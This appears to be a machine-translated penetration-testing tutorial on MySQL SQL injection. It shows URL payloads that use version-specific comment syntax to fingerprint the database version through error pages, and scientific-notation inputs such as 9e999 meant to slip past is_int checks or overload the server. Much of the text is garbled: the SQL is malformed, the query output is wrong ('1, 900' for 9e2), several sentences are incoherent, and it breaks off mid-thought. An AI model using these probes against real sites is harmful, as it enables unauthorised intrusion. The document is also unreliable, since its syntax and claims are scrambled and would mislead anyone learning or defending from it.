SQL Injection Concept

For the purpose of this example, MySQL seems to be a majority of databases used on this network. Similar technologies may also apply to others. In each SQL statement, there is a "unique feature of that product ". MySQL allows comment usage in SQL entries:
Select * slave table/* foo */
In MySQL, there is an extension of which MySQL code can be inserted in the method:
Select /*! SQL _NO_CACHE */Slave table

The comments show that the above comments treat each database except MySQL. MySQL to have a look in the comments and may change his behavior. For example, if MySQL is version 4.0.0 or higher:
Select /*! 40000 SQL _NO_CACHE */Slave table

This may be extremely useful for the Penetration Tester for discovering that the database is in use and his version is blind:
Try
Http: // foo/web. php? Table = 38-we get the normal Screen
Http: // foo/web. php? Table = 38/* % 20 s */-We get the normal Screen
Http: // foo/web. php? Table = 38 /*! % 20 s */-We get an exception screen because of syntactic errors in comments-MySQL is in use
Http: // foo/web. php? Table = 38 /*! 30000% 20 s */-We get an exception screen, MySQL is at least 3. x. x
Http: // foo/web. php? Table = 38 /*! 40000% 20 s */-We get an exception screen, MySQL is at least 4. x. x
Http: // foo/web. php? Table = 38 /*! 50000% 20 s */-We get the normal screen, MySQL is under 5.x. x
Http: // foo/web. php? Table = 38 /*! 40020% 20 s */-We get the normal screen, MySQL is under 4.0.20
Http: // foo/web. php? Table = 38 /*! 40017% 20 s */-We get an exception screen, MySQL is at least 4.0.17
Http: // foo/web. php? Table = 38 /*! 40018% 20 s */-We get the normal screen, MySQL is under 4.0.18

We can conclude that MySQL runs on site 4.0.17.

This is useful information because we may then know which exploits/vulnerabilities to try again. MySQL instances, such as Series 3. x. x, 4. x. x, and 5. x. x, provide other functions.

In addition, independent ideas. Most systems have not changed in this study. Check the default behavior of the MySQL database engine:
Mysql> select 9e0;
+ ----- +
| 9e0 |
+ ----- +
| 9 |
+ ----- +
1 column in the Set (0.02 seconds)

Mysql> select 9e2;
+ ----- +
| 9e2 |
+ ----- +
| 1, 900 |
+ ----- +
1 column in the Set (0.00 seconds)

Most language interpreters are trying to guess that something is related to their input. This input is confirmed against the width and pass. In this way, we can freely query a database in 9e9 on the backend. PHP users are often advised to use is_int ($ _ GET [foo]). This does not block this method from being internal as it is, and it is only 3 characters long. But it may take your database server down.

Tonu has a good penetration test case when there is almost impossible to receive any error message from this system. Finally, Tonu tries to send a 9e999 message somewhere as the line space is particularly large, similar to 30 seconds of "PHP pause in something. inc" input. Who operates for penetration testing knows how important any information is about the system internals. Tonu is able to download this company file with extremely large numbers of lines of Space missing